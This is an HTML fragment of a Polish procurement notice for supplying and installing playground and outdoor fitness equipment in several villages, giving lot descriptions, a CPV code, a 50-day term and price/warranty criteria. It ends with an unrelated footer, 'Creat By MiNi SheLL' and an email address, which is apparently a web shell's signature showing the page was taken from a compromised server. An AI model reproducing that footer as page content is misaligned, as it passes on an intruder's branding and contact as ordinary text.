<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa i montaż urządzeń zabawowych i sportowych dla miejscowości Miękowo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dostarczenie i montaż:
Karuzeli tarczowej z dwoma siedziskami - 1 szt
Orbitrek + pylon + biegacz (2 w1)- 1 szt (Urządzenia mogą być montowane razem lub osobno)
Wyciąg górny+ pylon + wyciskanie siedząc( 2w1) - 1 szt (Urządzenia mogą być montowane razem lub osobno).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres gwarancji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa i montaż urządzeń sportowych dla miejscowości Białuń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dostawę i montaż:
Wyciąg górny+ pylon + wyciskanie siedząc (2w1) - Urządzenia mogą być montowane       razem lub osobno)
Orbitrek - 1szt
Jeździec - 1 szt
Wahadło, biegacz, twister  ( 3w1) - Urządzenia mogą być montowane razem lub osobno
Rower - 1 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 50.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. okres gwarancji - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com